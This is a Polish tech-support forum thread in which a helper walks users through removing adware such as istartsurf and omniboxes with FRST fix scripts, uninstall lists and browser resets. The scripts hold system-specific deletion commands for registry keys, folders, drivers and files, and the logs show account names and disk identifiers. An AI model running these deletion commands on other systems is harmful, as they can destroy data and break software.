picasso

AnyProtect nie figurował na liście zainstalowanych w Addition (inne jego składniki owszem były widoczne), dlatego nie został zadany do deinstalacji via Dodaj/Usuń. Za to w międzyczasie nabawiłeś się nowych pozycji adware (istartsurf). Deinstalacje sporo zlikwidowały, ale tu nie koniec prac. Kolejne działania: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R1 {d2c0ab1d-6370-4786-b3bc-16a62a2a98bb}Gt; G:\WINDOWS\System32\drivers\{d2c0ab1d-6370-4786-b3bc-16a62a2a98bb}Gt.sys [55824 2015-03-08] (StdLib) R1 {e4db71b5-18d7-401c-9152-e63e79440e72}Gt; G:\WINDOWS\System32\drivers\{e4db71b5-18d7-401c-9152-e63e79440e72}Gt.sys [55824 2015-03-10] (StdLib) S2 globalUpdate; G:\Program Files\globalUpdate\Update\GoogleUpdate.exe [68608 2015-03-09] (globalUpdate) [File not signed] S3 globalUpdatem; G:\Program Files\globalUpdate\Update\GoogleUpdate.exe [68608 2015-03-09] (globalUpdate) [File not signed] R1 qrnfd_1_10_0_9; system32\drivers\qrnfd_1_10_0_9.sys [X] S4 sptd; System32\Drivers\sptd.sys [X] R4 {0ade837f-26ef-4080-95b6-a675bbebbd2b}Gt; system32\drivers\{0ade837f-26ef-4080-95b6-a675bbebbd2b}Gt.sys [X] Task: G:\WINDOWS\Tasks\APSnotifierPP1.job => G:\Program Files\AnyProtectEx\AnyProtect.exe Task: G:\WINDOWS\Tasks\APSnotifierPP2.job => G:\Program Files\AnyProtectEx\AnyProtect.exe Task: G:\WINDOWS\Tasks\APSnotifierPP3.job => G:\Program Files\AnyProtectEx\AnyProtect.exe Task: G:\WINDOWS\Tasks\CCVL.job => G:\Documents and Settings\Pc\Dane aplikacji\CCVL.exe Task: G:\WINDOWS\Tasks\globalUpdateUpdateTaskMachineCore.job => G:\Program Files\globalUpdate\Update\GoogleUpdate.exe Task: G:\WINDOWS\Tasks\globalUpdateUpdateTaskMachineUA.job => G:\Program Files\globalUpdate\Update\GoogleUpdate.exe HKLM\...\Run: [upfst_pl_6.exe] => G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\fst_pl_6\upfst_pl_6.exe -runhelper HKLM\...\Run: [fst_pl_19] => [X] HKLM\...\Run: [fst_pl_6] => [X] HKLM\...\Run: [fst_pl_73] => [X] HKLM\...\Run: [fst_pl_99] => [X] HKLM\...\Run: [gmsd_pl_65] => [X] HKLM\...\Run: [upgmsd_pl_65.exe] => G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\gmsd_pl_65\upgmsd_pl_65.exe -runhelper HKU\S-1-5-21-1275210071-117609710-839522115-1003\...\Run: [bearShare] => "G:\Program Files\BearShare Applications\BearShare\BearShare.exe" --lightmode HKU\S-1-5-21-1275210071-117609710-839522115-1003\...\Run: [iSUSPM] => G:\Documents and Settings\All Users\Dane aplikacji\FLEXnet\Connect\11\ISUSPM.exe -scheduler Startup: G:\Documents and Settings\Pc\Menu Start\Programy\Autostart\superpc_soft_partner.lnk GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.istartsurf.com/?type=hp&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.istartsurf.com/web/?type=ds&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.istartsurf.com/?type=hp&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.istartsurf.com/web/?type=ds&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E&q={searchTerms} HKU\S-1-5-21-1275210071-117609710-839522115-1003\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.interia.pl/#utm_source=instalki&utm_medium=installer&utm_campaign=instalki HKU\S-1-5-21-1275210071-117609710-839522115-1003\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-1275210071-117609710-839522115-1003\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.istartsurf.com/?type=hp&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURLs,Tabs: "http://www.interia.pl/#utm_source=instalki&utm_medium=installer&utm_campaign=instalki" SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?type=ds&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?type=ds&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E&q={searchTerms} SearchScopes: HKU\S-1-5-21-1275210071-117609710-839522115-1003 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?type=ds&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E&q={searchTerms} SearchScopes: HKU\S-1-5-21-1275210071-117609710-839522115-1003 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?type=ds&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E&q={searchTerms} StartMenuInternet: IEXPLORE.EXE - G:\Program Files\Internet Explorer\iexplore.exe http://www.mystartsearch.com/?type=sc&ts=1425850244&from=epom2&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E FF Plugin: @staging.google.com/globalUpdate Update;version=10 -> G:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll [2015-03-09] (globalUpdate) FF Plugin: @staging.google.com/globalUpdate Update;version=4 -> G:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll [2015-03-09] (globalUpdate) FF HKLM\...\Firefox\Extensions: [searchengine@gmail.com] - G:\Documents and Settings\Pc\Dane aplikacji\Mozilla\Firefox\Profiles\yygpirum.default-1404846490562\extensions\searchengine@gmail.com FF HKLM\...\Firefox\Extensions: [istart_ffnt@gmail.com] - G:\Documents and Settings\Pc\Dane aplikacji\Mozilla\Firefox\Profiles\yygpirum.default-1404846490562\extensions\istart_ffnt@gmail.com G:\Documents and Settings\All Users\Dane aplikacji\{ba121210-d50e-5ae8-ba12-21210d504843} G:\Documents and Settings\All Users\Dane aplikacji\9651896652148095366 G:\Documents and Settings\All Users\Dane aplikacji\cb595a1a00006ece G:\Documents and Settings\All Users\Dane aplikacji\fmhcfkifjpdlmcallfafjkgjemhiddnf G:\Documents and Settings\All Users\Menu Start\Programy\Catalyst Control Center G:\Documents and Settings\Pc\TempWmicBatchFile.bat G:\Documents and Settings\Pc\Dane aplikacji\CCVL.exe G:\Documents and Settings\Pc\Dane aplikacji\CCVL G:\Documents and Settings\Pc\Dane aplikacji\45443439-1425850326-4639-4637-3743FFFFFFFF G:\Documents and Settings\Pc\Dane aplikacji\AnyProtectEx G:\Documents and Settings\Pc\Dane aplikacji\ASPackage G:\Documents and Settings\Pc\Dane aplikacji\istartsurf G:\Documents and Settings\Pc\Dane aplikacji\Microsoft\Internet Explorer\Quick Launch\BearShare.lnk G:\Documents and Settings\Pc\Dane aplikacji\mystartsearch G:\Documents and Settings\Pc\Dane aplikacji\systweak G:\Documents and Settings\Pc\Menu Start\Programy\BearShare.lnk G:\Documents and Settings\Pc\Ustawienia lokalne\Temp.dat G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\nsb195.tmp G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\nsg302.tmp G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\nsx2C1.tmp G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\nsy16E.tmp G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\FilesFrog Update Checker G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\globalUpdate G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\SmartWeb G:\Program Files\globalUpdate G:\Program Files\IGS G:\Program Files\predm G:\Program Files\PriuceLesss G:\WINDOWS\system32\029B560A371F4E00AB32838EBC01B9E7 G:\WINDOWS\system32\BasementDusterOff.ini G:\WINDOWS\system32\BDL.dll G:\WINDOWS\system32\roboot.exe G:\WINDOWS\system32\TempWmicBatchFile.bat G:\WINDOWS\System32\drivers\{d2c0ab1d-6370-4786-b3bc-16a62a2a98bb}Gt.sys G:\WINDOWS\System32\drivers\{e4db71b5-18d7-401c-9152-e63e79440e72}Gt.sys Reg: reg delete HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} /f Reg: reg delete HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall" /f CMD: netsh winsock reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia trzeba będzie przeinstalować. 3. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: G:\Documents and Settings\Pc\Menu Start\Programy\Akcesoria\Narzędzia systemowe Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "G:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Wypowiedz się czy błąd startowy PowerDVD nadal występuje.

Ten błąd generuje wpis PowerDVD i nie wiadomo czy ma to cokolwiek wspólnego z infekcją: HKLM\...\Run: [PowerDVD14Agent] => G:\Program Files\CyberLink\PowerDVD14\PowerDVD14Agent.exe [795672 2014-08-12] (CyberLink Corp.). Owszem, masa obiektów adware w systemie. Dodatkowo, adware przekonwertowało przeglądarkę Google Chrome z wersji stabilnej do developerskiej i wymagana reinstalacja przeglądarki. Rozpoczniemy od deinstalacji adware, a po tym będą poprawki. Działania do przeprowadzenia: 1. Przez Dodaj/Usuń programy odinstaluj: - Adware/PUP: AnySend, App Lid, AppsHat Mobile Apps, BearShare, BetterDeals, ConvertAd, digi docket, GamesDesktop 008.65, Genieo, GoHDV09.03, HD Cinema Pro 1.8cV09.03, IGS, igsc, Improved Search, My Program version 1.5, mystartsearch uninstall, PriuceLesss, Quick Ref 1.10.0.9, Remote Desktop Access (VuuPC), SmartWeb, Super Optimizer v3.2, WinCheck - Poszkodowane Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Nie stosuj do deinstalacji Revo. Po deinstalacjach nie instaluj na razie Google Chrome, ani żadnych innych nowych aplikacji. 2. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pola Addition + Shortcut.

Obecnie portal dobreprogramy.pl nie jest bezpiecznym godnym zaufania miejscem: KLIK. Całkowicie odradzam pobieranie czegokolwiek stamtąd, nawet jeśli nie zostanie wybrany "Asystent". W raportach nie widać już czynnego "Search Protect" (to jest ochrona przekierowań istartsurf.com, by nie dało się ich usunąć), pozostały jednak powiązane foldery oraz liczne odniesienia do istartsurf.com. Akcja: 1. Odinstaluj stare niebezpieczne wersje: Adobe Flash Player 9 ActiveX, Adobe Reader 8 - Polish. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.istartsurf.com/?type=hppp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.istartsurf.com/web/?type=dspp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.istartsurf.com/?type=hppp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.istartsurf.com/web/?type=dspp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&q={searchTerms} HKU\S-1-5-21-2321440703-4263156153-367547396-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.istartsurf.com/web/?type=dspp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&q={searchTerms} HKU\S-1-5-21-2321440703-4263156153-367547396-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.istartsurf.com/?type=hppp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193 HKU\S-1-5-21-2321440703-4263156153-367547396-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.istartsurf.com/?type=hppp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193 HKU\S-1-5-21-2321440703-4263156153-367547396-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.istartsurf.com/web/?type=dspp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&q={searchTerms} SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?type=dspp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?type=dspp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&q={searchTerms} SearchScopes: HKU\S-1-5-21-2321440703-4263156153-367547396-1000 -> DefaultScope {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://www.istartsurf.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&ts=1426434299&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2321440703-4263156153-367547396-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.istartsurf.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&ts=1426434299&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2321440703-4263156153-367547396-1000 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://www.istartsurf.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&ts=1426434299&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2321440703-4263156153-367547396-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&ts=1426434299&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2321440703-4263156153-367547396-1000 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://www.istartsurf.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&ts=1426434299&type=default&q={searchTerms} StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe http://www.istartsurf.com/?type=sc&ts=1426434200&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193 FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\istartsurf.xml [2015-03-16] C:\Program Files\XTab C:\ProgramData\IHProtectUpDate C:\Users\Mężczyzna\Downloads\*(*)-dp*.exe C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia (Perapera Chinese i YouTube mp3) należy przeinstalować. 4. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Mężczyzna\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 5. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Zostały usunięte logi z OTL, więc temat nie trzyma się kupy, bo powyższe dane były pobierane z programu OTL. Jest tu mnóstwo kont: ==================== Accounts: ============================= ASIA (S-1-5-21-2981973968-1908128720-872019283-1005 - Limited - Enabled) => C:\Users\ASIA Renia (S-1-5-21-2981973968-1908128720-872019283-1003 - Administrator - Enabled) => C:\Users\Renia user (S-1-5-21-2981973968-1908128720-872019283-1000 - Administrator - Enabled) => C:\Users\user Wojo (S-1-5-21-2981973968-1908128720-872019283-1002 - Administrator - Enabled) => C:\Users\Wojo Dostarczone zostały raporty FRST tylko z kontekstu konta Wojo. Wymagane zestawy FRST.txt + Addition.txt z pozostałych kont. Zaloguj się po kolei na każde poprzez pełny restart komputera, a nie opcje Wyloguj czy Przełącz użytkownika, i zrób zestawy. Na koncie limitowanym ASIA FRST należy uruchomić przez dwuklik a nie "Uruchom jako Administrator" (co przestawi kontekst konta).

W raporcie FRST nie widać nic w przeglądarce Google Chrome, co nasuwa wnioski: prawdopodobnie adware zmodyfikowało / zainfekowało któryś globalny plik Google Chrome. 1. Powtórz krok reinstalacji z samego początku tematu: Nie instaluj przeglądarki, dopóki nie zostanie wykonany punkt 2: 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {2C59BAB6-F996-4246-9258-20333B03696A} - \Jelbrus Secure Web Task No Task File RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\Google RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox\extensions RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome RemoveDirectory: C:\Users\Kuba\AppData\Local\Google CMD: del /q C:\Users\Kuba\Downloads\adwcleaner*.exe CMD: del /q C:\Users\Kuba\Downloads\Chrome*.exe CMD: del /q C:\Users\Kuba\Downloads\tdsskiller*.exe CMD: del /q C:\Windows\SysWOW64\tasks.dll Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Nastąpi restart i powstanie plik fixlog.txt. 3. Zainstaluj najnowszą wersję Chrome: KLIK. 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Zgłaszasz problem miejsca na załączniki - posłuż się wklej.org, a ja przeniosę pliki do załączników.

Obecnie przekierowania Omnibox widać tylko w Google Chrome. Był tu używany także ComboFix... Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj stare wersje i zbędniki: Adobe Flash Player 16 NPAPI, Adobe Shockwave Player 12.1, Akamai NetSession Interface, Java 7 Update 67, Java 8 Update 25. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CHR StartupUrls: Default -> "hxxp://www.omniboxes.com/?type=hp&ts=1425494452&from=obw&uid=ST3500413AS_Z2A7FQ7PXXXXZ2A7FQ7P" CHR DefaultSearchKeyword: Default -> omniboxes CHR HKLM-x32\...\Chrome\Extension: [ahllmicjfilnopfmpmokidfabdacfkpi] - C:\ProgramData\Bcool\ahllmicjfilnopfmpmokidfabdacfkpi.crx [Not Found] FF Plugin: @videolan.org/vlc,version=2.0.2 -> C:\Program Files\VideoLAN\VLC\npvlc.dll No File FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll No File FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.21.79\npGoogleUpdate3.dll No File FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.21.79\npGoogleUpdate3.dll No File FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll No File FF Plugin HKU\S-1-5-21-3251776730-861767313-4254609882-1000: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Marek\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll No File HKU\S-1-5-21-3251776730-861767313-4254609882-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-3251776730-861767313-4254609882-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch URLSearchHook: HKLM-x32 - Default Value = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D} URLSearchHook: HKU\S-1-5-21-3251776730-861767313-4254609882-1000 - (No Name) - {BC86E1AB-EDA5-4059-938F-CE307B0C6F0A} - No File SearchScopes: HKU\S-1-5-21-3251776730-861767313-4254609882-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = Handler: mso-offdap - {3D9F03FA-7A94-11D3-BE81-0050048385D1} - No File Handler: mso-offdap11 - {32505114-5902-49B2-880A-1F7738E5A384} - No File HKLM-x32\...\Run: [Malwarebytes Anti-Exploit] => C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe HKU\S-1-5-21-3251776730-861767313-4254609882-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BasementDuster => ""="service" S3 MEMSWEEP2; C:\Windows\system32\3901.tmp [6144 2009-06-18] (Sophos Plc) [File not signed] U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [35064 2015-03-05] () U3 albxpmi3; No ImagePath S3 andnetadb; System32\Drivers\lgandnetadb.sys [X] S3 AndNetDiag; system32\DRIVERS\lgandnetdiag64.sys [X] S3 ANDNetModem; system32\DRIVERS\lgandnetmodem64.sys [X] S3 andnetndis; system32\DRIVERS\lgandnetndis64.sys [X] S3 appliandMP; system32\DRIVERS\appliand.sys [X] S2 ATE_PROCMON; \??\C:\Program Files (x86)\Anti Trojan Elite\ATEPMon.sys [X] S3 ATSZIO; \??\C:\Program Files (x86)\ASUS\ASUS PC Diagnostics\ATSZIO64.sys [X] S2 BasementDuster; C:\Program Files (x86)\IGS\BasementDuster.exe [X] S3 cleanhlp; \??\C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys [X] S3 dgderdrv; System32\drivers\dgderdrv.sys [X] S3 ewusbmbb; system32\DRIVERS\ewusbwwan.sys [X] S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X] S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S0 fsned; system32\drivers\bbcqq.sys [X] S3 huawei_cdcacm; system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_cdcecm; system32\DRIVERS\ew_jucdcecm.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 huawei_ext_ctrl; system32\DRIVERS\ew_juextctrl.sys [X] S3 huawei_wwanecm; system32\DRIVERS\ew_juwwanecm.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X] S3 hwusbfake; system32\DRIVERS\ewusbfake.sys [X] S3 NDSPCIIO; \??\C:\Windows\system32\DRIVERS\NDSPCIIO64.SYS [X] S3 RTL8192su; system32\DRIVERS\RTL8192su.sys [X] S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] U2 TMAgent; No ImagePath S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 usbbus; system32\DRIVERS\lgx64bus.sys [X] S3 UsbDiag; system32\DRIVERS\lgx64diag.sys [X] S3 USBModem; system32\DRIVERS\lgx64modem.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] S3 vserial; System32\DRIVERS\vserial.sys [X] S3 X6va008; \??\C:\Windows\SysWOW64\Drivers\X6va008 [X] S3 X6va011; \??\C:\Windows\SysWOW64\Drivers\X6va011 [X] S0 zhhh; system32\drivers\emeqb.sys [X] Task: {08F20D13-4690-4FC1-91C2-835CA17F784A} - System32\Tasks\{DD2ADB99-A079-4391-ADA9-6304C9F26FFE} => pcalua.exe -a C:\LGE400\USB_Driver\LG_SmartPhone\LGWindowsMobile_USBDriver_WHQL_ML_Ver_1.0.exe -d C:\LGE400\USB_Driver\LG_SmartPhone Task: {17A79EF3-7E4C-4B2D-8C07-E5ED82ADC51C} - System32\Tasks\{02C4D9D8-33BF-49FD-A366-ACA003139FDE} => pcalua.exe -a C:\Users\Marek\Downloads\AutodeskDesignRevSetup(1).exe -d "C:\Program Files (x86)\Mozilla Firefox" Task: {18B249CF-88D6-4CB1-ACB9-3C69326C220D} - System32\Tasks\{D71B946D-AE97-437E-AB40-FE5482C62F72} => pcalua.exe -a H:\RGSC\setup.exe -d H:\RGSC Task: {1C309FD6-D0B9-4B7E-A15A-CE8A743DA69C} - System32\Tasks\{60FEDB73-3B5A-40DA-AAC7-60A4EDAC31BE} => pcalua.exe -a C:\Users\Marek\Desktop\LiveSuitPack_1.11\LiveSuitPack_1.11\drvinstaller_X86.exe -d C:\Users\Marek\Desktop\LiveSuitPack_1.11\LiveSuitPack_1.11 Task: {1E296070-4AE2-476A-B145-BE85FAC337C3} - System32\Tasks\{C9EAA7F7-692B-4B00-AACD-5456C25D86D3} => pcalua.exe -a "C:\Users\Marek\tadeusza\kopia kartaMSD\Achicad15_PL\ArchiCAD 15\Setup.exe" -d "C:\Users\Marek\tadeusza\kopia kartaMSD\Achicad15_PL\ArchiCAD 15" Task: {1E633E3B-D70E-429D-8AD9-F4E418841244} - System32\Tasks\{C1105FE9-91FE-46AC-A8B8-2DFED467AAD7} => pcalua.exe -a D:\Setup.exe -d D:\ Task: {206AB8BF-B78C-4E89-86FB-0BA6CE7B5183} - System32\Tasks\{6D8FBAE8-EF73-4C15-ACA2-CF8722532925} => pcalua.exe -a C:\Users\Marek\Downloads\Sims3EP10\Sims3EP10\Sims3EP10Setup.exe -d C:\Users\Marek\Downloads\Sims3EP10\Sims3EP10 Task: {216E8A22-E8F1-4975-8D93-6C2A08326FF4} - System32\Tasks\{953D42B0-83D8-4ED3-B06F-1740FAA41902} => pcalua.exe -a C:\Users\Marek\Downloads\AC9-2172.exe -d "C:\Program Files\Graphisoft\ArchiCAD 15" Task: {222B3FA3-5036-4456-8F50-759401E9518D} - System32\Tasks\{8F129C33-F3CF-40C4-82F8-A713F2562375} => pcalua.exe -a "C:\Program Files (x86)\TornPlusTV_version1.11\UninstallBrw.exe" -d "C:\Program Files (x86)\TornPlusTV_version1.11" Task: {2AD44A90-0CC7-4C22-B8BC-1B030897E43C} - 